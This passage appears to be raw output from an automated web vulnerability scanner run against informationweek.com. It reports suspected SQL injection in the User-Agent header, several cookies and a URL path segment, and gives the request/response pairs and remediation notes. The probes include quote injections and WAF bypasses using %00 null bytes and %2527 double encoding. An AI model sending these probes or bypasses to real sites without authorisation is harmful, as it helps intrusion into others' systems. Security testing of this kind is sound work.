Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 96430
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>There are lots of problems with using Spans ports, and usage is starting to decline, especially because they can introduce errors. Net Optics Director provides a better return on investement because it can isolate key traffic.</span> ...[SNIP]...
Request 2
GET /video/security%2527%2527/20979809001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security%2527%2527/20979809001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:41 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:41 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 67777
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38477
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00'; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00''; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38475
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%00'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:14 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:14 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%00''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:15 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:15 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:27 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:27 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:09 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:09 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:59 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:59 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38480
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00'; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:16 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:16 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00''; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:17 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:17 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video%2527/security/68553969001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
